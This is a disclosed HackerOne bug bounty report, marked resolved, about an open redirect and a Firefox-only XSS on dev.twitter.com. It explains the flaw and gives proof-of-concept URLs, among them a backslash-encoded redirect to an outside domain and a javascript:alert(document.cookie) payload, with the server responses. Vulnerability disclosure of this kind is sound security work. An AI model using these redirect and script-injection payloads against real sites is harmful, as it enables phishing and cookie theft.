[dev.twitter.com] XSS and Open Redirect

Disclosed: 2017-09-29 23:07:42 By bobrov To x
Medium
Vulnerability Details
Description === XSS via Request-URI which requires user interaction. The vulnerability is caused by the difference in the Request-URI processing in the Location header and in the link on the page. By creating an incorrect port in the link on the Location header, you can block the redirection for the FireFox browser. Next, using the difference in the processing, generate a "javascript" link on the page. PoC: Open Redirect === Browsers: Chrome, FireFox, Opera ``` https://dev.twitter.com/https:/%5cblackfan.ru/ ``` HTTP Response: ```http HTTP/1.1 302 Found connection: close ... location: https:/\blackfan.ru ``` PoC: XSS === Browsers: FireFox Steps to reproduce: Open and click the link ``` https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/ ``` HTTP Response: ```http HTTP/1.1 302 Found connection: close ... location: //x:1/://dev.twitter.com/javascript:alert(document.cookie) ... <p>You should be redirected automatically to target URL: <a href="javascript:alert(document.cookie)">javascript:alert(document.cookie)</a>. If not click the link. ``` {F213436}
Actions
View on HackerOne
Report Stats
  • Report ID: 260744
  • State: Closed
  • Substate: resolved
  • Upvotes: 68
Share this report